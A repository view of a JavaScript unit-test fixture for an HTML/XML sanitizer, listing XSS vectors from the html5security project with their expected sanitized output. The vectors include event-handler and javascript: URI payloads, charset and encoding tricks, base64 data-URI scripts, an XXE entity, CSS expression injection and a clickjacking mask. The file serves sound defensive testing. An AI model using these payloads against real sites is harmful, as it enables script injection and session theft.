parser/xml/test/unit/results.js@8bccb770b82d
parser/xml/test/unit/results.js
Wed, 31 Dec 2014 13:27:57 +0100
- author
- Michael Schloh von Bennewitz <michael@schloh.com>
- date
- Wed, 31 Dec 2014 13:27:57 +0100
- branch
- TOR_BUG_3246
- changeset 6
- 8bccb770b82d
- permissions
- -rw-r--r--
Ignore runtime configuration files generated during quality assurance.
1 // vectors by the html5security project (https://code.google.com/p/html5security/ & Creative Commons 3.0 BY), see CC-BY-LICENSE for the full license
3 var vectors = [
4 {
5 "data": "<form id=\"test\"></form><button form=\"test\" formaction=\"javascript:alert(1)\">X</button>",
6 "sanitized": "<html><head></head><body></body></html>"
7 },
8 {
9 "data": "<meta charset=\"x-imap4-modified-utf7\">&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi",
10 "sanitized": "<html><head></head><body>&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi</body></html>"
11 },
12 {
13 "data": "<meta charset=\"x-imap4-modified-utf7\">&<script&S1&TS&1>alert&A7&(1)&R&UA;&&<&A9&11/script&X&>",
14 "sanitized": "<html><head></head><body>&alert&A7&(1)&R&UA;&&<&A9&11/script&X&></body></html>"
15 },
16 {
17 "data": "0?<script>Worker(\"#\").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))",
18 "sanitized": "<html><head></head><body>0? :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))</body></html>"
19 },
20 {
21 "data": "<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>",
22 "sanitized": "<html><head></head><body></body></html>"
23 },
24 {
25 "data": "<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>",
26 "sanitized": "<html><head></head><body></body></html>"
27 },
28 {
29 "data": "<input onfocus=write(1) autofocus>",
30 "sanitized": "<html><head></head><body></body></html>"
31 },
32 {
33 "data": "<input onblur=write(1) autofocus><input autofocus>",
34 "sanitized": "<html><head></head><body></body></html>"
35 },
36 {
37 "data": "<a style=\"-o-link:'javascript:alert(1)';-o-link-source:current\">X</a>",
38 "sanitized": "<html><head></head><body><a>X</a></body></html>"
39 },
40 {
41 "data": "<video poster=javascript:alert(1)//></video>",
42 "sanitized": "<html><head></head><body><video controls=\"controls\" poster=\"javascript:alert(1)//\"></video></body></html>"
43 },
44 {
45 "data": "<svg xmlns=\"http://www.w3.org/2000/svg\"><g onload=\"javascript:alert(1)\"></g></svg>",
46 "sanitized": "<html><head></head><body></body></html>"
47 },
48 {
49 "data": "<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>",
50 "sanitized": "<html><head></head><body><br><br><br><br><br><br>...<br><br><br><br></body></html>"
51 },
52 {
53 "data": "<x repeat=\"template\" repeat-start=\"999999\">0<y repeat=\"template\" repeat-start=\"999999\">1</y></x>",
54 "sanitized": "<html><head></head><body>01</body></html>"
55 },
56 {
57 "data": "<input pattern=^((a+.)a)+$ value=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!>",
58 "sanitized": "<html><head></head><body></body></html>"
59 },
60 {
61 "data": "<script>({0:#0=alert/#0#/#0#(0)})</script>",
62 "sanitized": "<html><head></head><body></body></html>"
63 },
64 {
65 "data": "X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >",
66 "sanitized": "<html><head></head><body>X</body></html>"
67 },
68 {
69 "data": "<?xml-stylesheet href=\"javascript:alert(1)\"?><root/>",
70 "sanitized": "<html><head></head><body></body></html>"
71 },
72 {
73 "data": "<script xmlns=\"http://www.w3.org/1999/xhtml\">alert(1)</script>",
74 "sanitized": "<html><head></head><body></body></html>"
75 },
76 {
77 "data": "<meta charset=\"x-mac-farsi\">�script �alert(1)//�/script �",
78 "sanitized": "<html><head></head><body>�script �alert(1)//�/script �</body></html>"
79 },
80 {
81 "data": "<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>",
82 "sanitized": "<html><head></head><body></body></html>"
83 },
84 {
85 "data": "<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>",
86 "sanitized": "<html><head></head><body></body></html>"
87 },
88 {
89 "data": "<input onblur=focus() autofocus><input>",
90 "sanitized": "<html><head></head><body></body></html>"
91 },
92 {
93 "data": "<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>",
94 "sanitized": "<html><head></head><body></body></html>"
95 },
96 {
97 "data": "1<set/xmlns=`urn:schemas-microsoft-com:time` style=`behAvior:url(#default#time2)` attributename=`innerhtml` to=`<img/src="x"onerror=alert(1)>`>",
98 "sanitized": "<html><head></head><body>1</body></html>"
99 },
100 {
101 "data": "<script src=\"#\">{alert(1)}</script>;1",
102 "sanitized": "<html><head></head><body>;1</body></html>"
103 },
104 {
105 "data": "+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);",
106 "sanitized": "<html><head></head><body>+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);</body></html>"
107 },
108 {
109 "data": "<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>",
110 "sanitized": "<html><head></head><body></body></html>"
111 },
112 {
113 "data": "1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=<img/src="."onerror=alert(1)>>",
114 "sanitized": "<html><head></head><body>1</body></html>"
115 },
116 {
117 "data": "<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d",
118 "sanitized": "<html><head></head><body></body></html>"
119 },
120 {
121 "data": "<style>@import \"data:,*%7bx:expression(write(1))%7D\";</style>",
122 "sanitized": "<html><head></head><body></body></html>"
123 },
124 {
125 "data": "<frameset onload=alert(1)>",
126 "sanitized": "<html><head></head></html>"
127 },
128 {
129 "data": "<table background=\"javascript:alert(1)\"></table>",
130 "sanitized": "<html><head></head><body><table></table></body></html>"
131 },
132 {
133 "data": "<a style=\"pointer-events:none;position:absolute;\"><a style=\"position:absolute;\" onclick=\"alert(1);\">XXX</a></a><a href=\"javascript:alert(2)\">XXX</a>",
134 "sanitized": "<html><head></head><body><a></a><a>XXX</a><a>XXX</a></body></html>"
135 },
136 {
137 "data": "1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#xss></vmlframe>",
138 "sanitized": "<html><head></head><body>1</body></html>"
139 },
140 {
141 "data": "1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>",
142 "sanitized": "<html><head></head><body>1<a></a></body></html>"
143 },
144 {
145 "data": "<a style=\"behavior:url(#default#AnchorClick);\" folder=\"javascript:alert(1)\">XXX</a>",
146 "sanitized": "<html><head></head><body><a>XXX</a></body></html>"
147 },
148 {
149 "data": "<!--<img src=\"--><img src=x onerror=alert(1)//\">",
150 "sanitized": "<html><head></head><body><img></body></html>"
151 },
152 {
153 "data": "<comment><img src=\"</comment><img src=x onerror=alert(1)//\">",
154 "sanitized": "<html><head></head><body><img></body></html>"
155 },
156 {
157 "data": "<!-- up to Opera 11.52, FF 3.6.28 -->\r\n<![><img src=\"]><img src=x onerror=alert(1)//\">\r\n\r\n<!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ -->\r\n<svg><![CDATA[><image xlink:href=\"]]><img src=xx:x onerror=alert(2)//\"></svg>",
158 "sanitized": "<html><head></head><body><img>\n\n\n><image xlink:href=\"<img></body></html>"
159 },
160 {
161 "data": "<style><img src=\"</style><img src=x onerror=alert(1)//\">",
162 "sanitized": "<html><head></head><body><img></body></html>"
163 },
164 {
165 "data": "<li style=list-style:url() onerror=alert(1)></li>\n<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>",
166 "sanitized": "<html><head></head><body><li></li>\n<div></div></body></html>"
167 },
168 {
169 "data": "<head><base href=\"javascript://\"/></head><body><a href=\"/. /,alert(1)//#\">XXX</a></body>",
170 "sanitized": "<html><head></head><body><a>XXX</a></body></html>"
171 },
172 {
173 "data": "<?xml version=\"1.0\" standalone=\"no\"?>\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<style type=\"text/css\">\r\n@font-face {font-family: y; src: url(\"font.svg#x\") format(\"svg\");} body {font: 100px \"y\";}\r\n</style>\r\n</head>\r\n<body>Hello</body>\r\n</html>",
174 "sanitized": "<html><head>\n\n</head>\n<body>Hello\n</body></html>"
175 },
176 {
177 "data": "<style>*[{}@import'test.css?]{color: green;}</style>X",
178 "sanitized": "<html><head></head><body>X</body></html>"
179 },
180 {
181 "data": "<div style=\"font-family:'foo[a];color:red;';\">XXX</div>",
182 "sanitized": "<html><head></head><body><div>XXX</div></body></html>"
183 },
184 {
185 "data": "<div style=\"font-family:foo}color=red;\">XXX</div>",
186 "sanitized": "<html><head></head><body><div>XXX</div></body></html>"
187 },
188 {
189 "data": "<svg xmlns=\"http://www.w3.org/2000/svg\"><script>alert(1)</script></svg>",
190 "sanitized": "<html><head></head><body></body></html>"
191 },
192 {
193 "data": "<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>",
194 "sanitized": "<html><head></head><body></body></html>"
195 },
196 {
197 "data": "<OBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\"><PARAM NAME=\"DataURL\" VALUE=\"javascript:alert(1)\"></OBJECT>",
198 "sanitized": "<html><head></head><body></body></html>"
199 },
200 {
201 "data": "<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></object>",
202 "sanitized": "<html><head></head><body></body></html>"
203 },
204 {
205 "data": "<embed src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></embed>",
206 "sanitized": "<html><head></head><body></body></html>"
207 },
208 {
209 "data": "<x style=\"behavior:url(test.sct)\">",
210 "sanitized": "<html><head></head><body></body></html>"
211 },
212 {
213 "data": "<xml id=\"xss\" src=\"test.htc\"></xml>\r\n<label dataformatas=\"html\" datasrc=\"#xss\" datafld=\"payload\"></label>",
214 "sanitized": "<html><head></head><body>\n<label></label></body></html>"
215 },
216 {
217 "data": "<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>",
218 "sanitized": "<html><head></head><body></body></html>"
219 },
220 {
221 "data": "<video><source onerror=\"alert(1)\">",
222 "sanitized": "<html><head></head><body><video controls=\"controls\"><source></video></body></html>"
223 },
224 {
225 "data": "<video onerror=\"alert(1)\"><source></source></video>",
226 "sanitized": "<html><head></head><body><video controls=\"controls\"><source></video></body></html>"
227 },
228 {
229 "data": "<b <script>alert(1)//</script>0</script></b>",
230 "sanitized": "<html><head></head><body><b>alert(1)//0</b></body></html>"
231 },
232 {
233 "data": "<b><script<b></b><alert(1)</script </b></b>",
234 "sanitized": "<html><head></head><body><b></b></body></html>"
235 },
236 {
237 "data": "<div id=\"div1\"><input value=\"``onmouseover=alert(1)\"></div> <div id=\"div2\"></div><script>document.getElementById(\"div2\").innerHTML = document.getElementById(\"div1\").innerHTML;</script>",
238 "sanitized": "<html><head></head><body><div id=\"div1\"></div> <div id=\"div2\"></div></body></html>"
239 },
240 {
241 "data": "<div style=\"[a]color[b]:[c]red\">XXX</div>",
242 "sanitized": "<html><head></head><body><div>XXX</div></body></html>"
243 },
244 {
245 "data": "<div style=\"\\63	\\06f
\\0006c\\00006F
\\R:\\000072 Ed;color\\0\\bla:yellow\\0\\bla;col\\0\\00 \\ or:blue;\">XXX</div>",
246 "sanitized": "<html><head></head><body><div>XXX</div></body></html>"
247 },
248 {
249 "data": "<!-- IE 6-8 -->\r\n<x '=\"foo\"><x foo='><img src=x onerror=alert(1)//'>\r\n\r\n<!-- IE 6-9 -->\r\n<! '=\"foo\"><x foo='><img src=x onerror=alert(2)//'>\r\n<? '=\"foo\"><x foo='><img src=x onerror=alert(3)//'>",
250 "sanitized": "<html><head></head><body>\n\n\n\n</body></html>"
251 },
252 {
253 "data": "<embed src=\"javascript:alert(1)\"></embed> // O10.10�, OM10.0�, GC6�, FF\r\n<img src=\"javascript:alert(2)\">\r\n<image src=\"javascript:alert(2)\"> // IE6, O10.10�, OM10.0�\r\n<script src=\"javascript:alert(3)\"></script> // IE6, O11.01�, OM10.1�",
254 "sanitized": "<html><head></head><body> // O10.10�, OM10.0�, GC6�, FF\n<img>\n<img> // IE6, O10.10�, OM10.0�\n // IE6, O11.01�, OM10.1�</body></html>"
255 },
256 {
257 "data": "<!DOCTYPE x[<!ENTITY x SYSTEM \"http://html5sec.org/test.xxe\">]><y>&x;</y>",
258 "sanitized": "<!DOCTYPE x[<!entity>\n<html><head></head><body>]>&x;</body></html>"
259 },
260 {
261 "data": "<svg onload=\"javascript:alert(1)\" xmlns=\"http://www.w3.org/2000/svg\"></svg>",
262 "sanitized": "<html><head></head><body></body></html>"
263 },
264 {
265 "data": "<?xml version=\"1.0\"?>\n<?xml-stylesheet type=\"text/xsl\" href=\"data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E\"?>\n<root/>",
266 "sanitized": "<html><head></head><body></body></html>"
267 },
268 {
269 "data": "<!DOCTYPE x [\r\n\t<!ATTLIST img xmlns CDATA \"http://www.w3.org/1999/xhtml\" src CDATA \"xx:x\"\r\n onerror CDATA \"alert(1)\"\r\n onload CDATA \"alert(2)\">\r\n]><img />",
270 "sanitized": "<!DOCTYPE x>\n<html><head></head><body>]><img></body></html>"
271 },
272 {
273 "data": "<doc xmlns:xlink=\"http://www.w3.org/1999/xlink\" xmlns:html=\"http://www.w3.org/1999/xhtml\">\r\n\t<html:style /><x xlink:href=\"javascript:alert(1)\" xlink:type=\"simple\">XXX</x>\r\n</doc>",
274 "sanitized": "<html><head></head><body>\n\tXXX\n</body></html>"
275 },
276 {
277 "data": "<card xmlns=\"http://www.wapforum.org/2001/wml\"><onevent type=\"ontimer\"><go href=\"javascript:alert(1)\"/></onevent><timer value=\"1\"/></card>",
278 "sanitized": "<html><head></head><body></body></html>"
279 },
280 {
281 "data": "<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>",
282 "sanitized": "<html><head></head><body><div>x</div></body></html>"
283 },
284 {
285 "data": "<// style=x:expression\\28write(1)\\29>",
286 "sanitized": "<html><head></head><body></body></html>"
287 },
288 {
289 "data": "<form><button formaction=\"javascript:alert(1)\">X</button>",
290 "sanitized": "<html><head></head><body></body></html>"
291 },
292 {
293 "data": "<event-source src=\"event.php\" onload=\"alert(1)\">",
294 "sanitized": "<html><head></head><body></body></html>"
295 },
296 {
297 "data": "<a href=\"javascript:alert(1)\"><event-source src=\"data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A\" /></a>",
298 "sanitized": "<html><head></head><body><a></a></body></html>"
299 },
300 {
301 "data": "<script<{alert(1)}/></script </>",
302 "sanitized": "<html><head></head><body></body></html>"
303 },
304 {
305 "data": "<?xml-stylesheet type=\"text/css\"?><!DOCTYPE x SYSTEM \"test.dtd\"><x>&x;</x>",
306 "sanitized": "<!DOCTYPE x SYSTEM \"test.dtd\">\n<html><head></head><body>&x;</body></html>"
307 },
308 {
309 "data": "<?xml-stylesheet type=\"text/css\"?><root style=\"x:expression(write(1))\"/>",
310 "sanitized": "<html><head></head><body></body></html>"
311 },
312 {
313 "data": "<?xml-stylesheet type=\"text/xsl\" href=\"#\"?><img xmlns=\"x-schema:test.xdr\"/>",
314 "sanitized": "<html><head></head><body><img></body></html>"
315 },
316 {
317 "data": "<object allowscriptaccess=\"always\" data=\"test.swf\"></object>",
318 "sanitized": "<html><head></head><body></body></html>"
319 },
320 {
321 "data": "<style>*{x:EXPRESSION(write(1))}</style>",
322 "sanitized": "<html><head></head><body></body></html>"
323 },
324 {
325 "data": "<x xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:actuate=\"onLoad\" xlink:href=\"javascript:alert(1)\" xlink:type=\"simple\"/>",
326 "sanitized": "<html><head></head><body></body></html>"
327 },
328 {
329 "data": "<?xml-stylesheet type=\"text/css\" href=\"data:,*%7bx:expression(write(2));%7d\"?>",
330 "sanitized": "<html><head></head><body></body></html>"
331 },
332 {
333 "data": "<x:template xmlns:x=\"http://www.wapforum.org/2001/wml\" x:ontimer=\"$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)\"><x:timer value=\"1\"/></x:template>",
334 "sanitized": "<html><head></head><body></body></html>"
335 },
336 {
337 "data": "<x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"javascript:alert(1)//#x\"/>",
338 "sanitized": "<html><head></head><body></body></html>"
339 },
340 {
341 "data": "<x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"test.evt#x\"/>",
342 "sanitized": "<html><head></head><body></body></html>"
343 },
344 {
345 "data": "<body oninput=alert(1)><input autofocus>",
346 "sanitized": "<html><head></head><body></body></html>"
347 },
348 {
349 "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<a xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:href=\"javascript:alert(1)\"><rect width=\"1000\" height=\"1000\" fill=\"white\"/></a>\n</svg>",
350 "sanitized": "<html><head></head><body>\n\n</body></html>"
351 },
352 {
353 "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n\n<animation xlink:href=\"javascript:alert(1)\"/>\n<animation xlink:href=\"data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E\"/>\n\n<image xlink:href=\"data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E\"/>\n\n<foreignObject xlink:href=\"javascript:alert(1)\"/>\n<foreignObject xlink:href=\"data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E\"/>\n\n</svg>",
354 "sanitized": "<html><head></head><body>\n\n\n\n\n\n\n\n\n\n</body></html>"
355 },
356 {
357 "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<set attributeName=\"onmouseover\" to=\"alert(1)\"/>\n<animate attributeName=\"onunload\" to=\"alert(1)\"/>\n</svg>",
358 "sanitized": "<html><head></head><body>\n\n\n</body></html>"
359 },
360 {
361 "data": "<!-- Up to Opera 10.63 -->\r\n<div style=content:url(test2.svg)></div>\r\n\r\n<!-- Up to Opera 11.64 - see link below -->\r\n\r\n<!-- Up to Opera 12.x -->\r\n<div style=\"background:url(test5.svg)\">PRESS ENTER</div>",
362 "sanitized": "<html><head></head><body><div></div>\n\n\n\n\n<div>PRESS ENTER</div></body></html>"
363 },
364 {
365 "data": "[A]\n<? foo=\"><script>alert(1)</script>\">\n<! foo=\"><script>alert(1)</script>\">\n</ foo=\"><script>alert(1)</script>\">\n[B]\n<? foo=\"><x foo='?><script>alert(1)</script>'>\">\n[C]\n<! foo=\"[[[x]]\"><x foo=\"]foo><script>alert(1)</script>\">\n[D]\n<% foo><x foo=\"%><script>alert(1)</script>\">",
366 "sanitized": "<html><head></head><body>[A]\n\">\n\">\n\">\n[B]\n\">\n[C]\n\n[D]\n<% foo></body></html>"
367 },
368 {
369 "data": "<div style=\"background:url(http://foo.f/f oo/;color:red/*/foo.jpg);\">X</div>",
370 "sanitized": "<html><head></head><body><div>X</div></body></html>"
371 },
372 {
373 "data": "<div style=\"list-style:url(http://foo.f)\\20url(javascript:alert(1));\">X</div>",
374 "sanitized": "<html><head></head><body><div>X</div></body></html>"
375 },
376 {
377 "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<handler xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\">alert(1)</handler>\n</svg>",
378 "sanitized": "<html><head></head><body>\nalert(1)\n</body></html>"
379 },
380 {
381 "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n<feImage>\n<set attributeName=\"xlink:href\" to=\"data:image/svg+xml;charset=utf-8;base64,\nPHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D\"/>\n</feImage>\n</svg>",
382 "sanitized": "<html><head></head><body>\n\n\n\n</body></html>"
383 },
384 {
385 "data": "<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>\n<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>",
386 "sanitized": "<html><head></head><body>\n</body></html>"
387 },
388 {
389 "data": "<!-- IE 5-9 -->\r\n<div id=d><x xmlns=\"><iframe onload=alert(1)\"></div>\n<script>d.innerHTML+='';</script>\r\n\r\n<!-- IE 10 in IE5-9 Standards mode -->\r\n<div id=d><x xmlns='\"><iframe onload=alert(2)//'></div>\n<script>d.innerHTML+='';</script>",
390 "sanitized": "<html><head></head><body><div id=\"d\"></div>\n\n\n\n<div id=\"d\"></div>\n</body></html>"
391 },
392 {
393 "data": "<div id=d><div style=\"font-family:'sans\\27\\2F\\2A\\22\\2A\\2F\\3B color\\3Ared\\3B'\">X</div></div>\n<script>with(document.getElementById(\"d\"))innerHTML=innerHTML</script>",
394 "sanitized": "<html><head></head><body><div id=\"d\"><div>X</div></div>\n</body></html>"
395 },
396 {
397 "data": "XXX<style>\r\n\r\n*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */\r\n\r\n<!--\r\n--><!--*{color:red} /* all UA */\r\n\r\n*{background:url(xx:x //**/\\red/*)} /* IE 6-7 Standards mode */\r\n\r\n</style>",
398 "sanitized": "<html><head></head><body>XXX</body></html>"
399 },
400 {
401 "data": "<img[a][b]src=x[d]onerror[c]=[e]\"alert(1)\">",
402 "sanitized": "<html><head></head><body></body></html>"
403 },
404 {
405 "data": "<a href=\"[a]java[b]script[c]:alert(1)\">XXX</a>",
406 "sanitized": "<html><head></head><body><a>XXX</a></body></html>"
407 },
408 {
409 "data": "<img src=\"x` `<script>alert(1)</script>\"` `>",
410 "sanitized": "<html><head></head><body><img></body></html>"
411 },
412 {
413 "data": "<script>history.pushState(0,0,'/i/am/somewhere_else');</script>",
414 "sanitized": "<html><head></head><body></body></html>"
415 },
416 {
417 "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" id=\"foo\">\r\n<x xmlns=\"http://www.w3.org/2001/xml-events\" event=\"load\" observer=\"foo\" handler=\"data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar\"/>\r\n</svg>",
418 "sanitized": "<html><head></head><body>\n\n</body></html>"
419 },
420 {
421 "data": "<iframe src=\"data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03\"></iframe>",
422 "sanitized": "<html><head></head><body></body></html>"
423 },
424 {
425 "data": "<img src onerror /\" '\"= alt=alert(1)//\">",
426 "sanitized": "<html><head></head><body><img></body></html>"
427 },
428 {
429 "data": "<title onpropertychange=alert(1)></title><title title=></title>",
430 "sanitized": "<html><head><title></title><title title=\"\"></title></head><body></body></html>"
431 },
432 {
433 "data": "<!-- IE 5-8 standards mode -->\r\n<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=xx:x onerror=alert(1)></a>\">\r\n\r\n<!-- IE 5-9 standards mode -->\r\n<!a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(2)//\">\r\n<?a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(3)//\">",
434 "sanitized": "<html><head></head><body><a href=\"http://foo.bar/#x=%60y\"></a><img alt=\"`><img src=xx:x onerror=alert(1)></a>\">\n\n\n<img alt=\"`><img src=xx:x onerror=alert(2)//\">\n<img alt=\"`><img src=xx:x onerror=alert(3)//\"></body></html>"
435 },
436 {
437 "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<a id=\"x\"><rect fill=\"white\" width=\"1000\" height=\"1000\"/></a>\n<rect fill=\"white\" style=\"clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);\"/>\n</svg>",
438 "sanitized": "<html><head></head><body>\n\n\n</body></html>"
439 },
440 {
441 "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\r\n<path d=\"M0,0\" style=\"marker-start:url(test4.svg#a)\"/>\r\n</svg>",
442 "sanitized": "<html><head></head><body>\n\n</body></html>"
443 },
444 {
445 "data": "<div style=\"background:url(/f#[a]oo/;color:red/*/foo.jpg);\">X</div>",
446 "sanitized": "<html><head></head><body><div>X</div></body></html>"
447 },
448 {
449 "data": "<div style=\"font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\">X</div>",
450 "sanitized": "<html><head></head><body><div>X</div></body></html>"
451 },
452 {
453 "data": "<div id=\"x\">XXX</div>\n<style>\n\n#x{font-family:foo[bar;color:green;}\n\n#y];color:red;{}\n\n</style>",
454 "sanitized": "<html><head></head><body><div id=\"x\">XXX</div>\n</body></html>"
455 },
456 {
457 "data": "<x style=\"background:url('x[a];color:red;/*')\">XXX</x>",
458 "sanitized": "<html><head></head><body>XXX</body></html>"
459 },
460 {
461 "data": "<!--[if]><script>alert(1)</script -->\r\n<!--[if<img src=x onerror=alert(2)//]> -->",
462 "sanitized": "<html><head></head><body></body></html>"
463 },
464 {
465 "data": "<div id=\"x\">x</div>\n<xml:namespace prefix=\"t\">\n<import namespace=\"t\" implementation=\"#default#time2\">\n<t:set attributeName=\"innerHTML\" targetElement=\"x\" to=\"<imgsrc=x:xonerror=alert(1)>\">",
466 "sanitized": "<html><head></head><body><div id=\"x\">x</div>\n\n\n</body></html>"
467 },
468 {
469 "data": "<a href=\"http://attacker.org\">\n\t<iframe src=\"http://example.org/\"></iframe>\n</a>",
470 "sanitized": "<html><head></head><body><a href=\"http://attacker.org\">\n\t\n</a></body></html>"
471 },
472 {
473 "data": "<div draggable=\"true\" ondragstart=\"event.dataTransfer.setData('text/plain','malicious code');\">\n\t<h1>Drop me</h1>\n</div>\n\n<iframe src=\"http://www.example.org/dropHere.html\"></iframe>",
474 "sanitized": "<html><head></head><body><div draggable=\"true\">\n\t<h1>Drop me</h1>\n</div>\n\n</body></html>"
475 },
476 {
477 "data": "<iframe src=\"view-source:http://www.example.org/\" frameborder=\"0\" style=\"width:400px;height:180px\"></iframe>\n\n<textarea type=\"text\" cols=\"50\" rows=\"10\"></textarea>",
478 "sanitized": "<html><head></head><body>\n\n<textarea type=\"text\" cols=\"50\" rows=\"10\"></textarea></body></html>"
479 },
480 {
481 "data": "<script>\nfunction makePopups(){\n\tfor (i=1;i<6;i++) {\n\t\twindow.open('popup.html','spam'+i,'width=50,height=50');\n\t}\n}\n</script>\n\n<body>\n<a href=\"#\" onclick=\"makePopups()\">Spam</a>",
482 "sanitized": "<html><head>\n\n</head><body>\n<a>Spam</a></body></html>"
483 },
484 {
485 "data": "<html xmlns=\"http://www.w3.org/1999/xhtml\"\nxmlns:svg=\"http://www.w3.org/2000/svg\">\n<body style=\"background:gray\">\n<iframe src=\"http://example.com/\" style=\"width:800px; height:350px; border:none; mask: url(#maskForClickjacking);\"/>\n<svg:svg>\n<svg:mask id=\"maskForClickjacking\" maskUnits=\"objectBoundingBox\" maskContentUnits=\"objectBoundingBox\">\n\t<svg:rect x=\"0.0\" y=\"0.0\" width=\"0.373\" height=\"0.3\" fill=\"white\"/>\n\t<svg:circle cx=\"0.45\" cy=\"0.7\" r=\"0.075\" fill=\"white\"/>\n</svg:mask>\n</svg:svg>\n</body>\n</html>",
486 "sanitized": "<html><head></head><body>\n\n<svg:svg>\n<svg:mask id=\"maskForClickjacking\" maskUnits=\"objectBoundingBox\" maskContentUnits=\"objectBoundingBox\">\n\t<svg:rect x=\"0.0\" y=\"0.0\" width=\"0.373\" height=\"0.3\" fill=\"white\"/>\n\t<svg:circle cx=\"0.45\" cy=\"0.7\" r=\"0.075\" fill=\"white\"/>\n</svg:mask>\n</svg:svg>\n</body>\n</html></body></html>"
487 },
488 {
489 "data": "<iframe sandbox=\"allow-same-origin allow-forms allow-scripts\" src=\"http://example.org/\"></iframe>",
490 "sanitized": "<html><head></head><body></body></html>"
491 },
492 {
